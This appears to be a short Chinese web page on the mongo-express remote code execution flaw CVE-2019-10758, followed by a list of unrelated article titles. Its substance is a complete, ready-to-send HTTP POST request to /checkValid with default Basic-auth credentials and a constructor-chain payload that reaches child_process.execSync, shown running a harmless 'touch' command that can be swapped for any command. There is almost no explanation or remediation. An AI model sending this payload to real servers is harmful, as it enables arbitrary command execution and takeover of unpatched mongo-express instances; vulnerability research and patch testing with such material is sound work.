mongo-express 远程代码执行漏洞(CVE-2019-10758)
2024-10-19 11:34:45
影响版本
mongo-express 0.53.0
POST /checkValid HTTP/1.1
Host: 192.168.49.2:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
最新文章
- (第六天)DOM
- 下载imagenet2012数据集
- AngularJS 2 VS Code Linter环境设置
- SQL Server 2012 安装
- UESTC 250
- iOS 开发进程与线程
- PowerMockito(PowerMock用法)
- POJ 2125 Destroying The Graph (二分图最小点权覆盖集+输出最小割方案)
- 使用tcpdump抓Android网络包
- Creating Spatial Indexes(mysql 创建空间索引 The used table type doesn't support SPATIAL indexes)
- IOS7学习之路一(新UI之自定义UITableViewCell)
- HiveQL DML 常用QL示例资料
- Python爬虫之正则表达式(1)
- Winform开发框架中工作流模块的动态处理
- Ubuntu下安装Flask虚拟环境及使用
- eclipse添加插件实现php的增删改查
- linux服务不支持chkconfig的解决
- mysql 插多行数据
- iOS &; Android APP crash保护机制
- [BZOJ1024][SCOI2009]生日快乐解题报告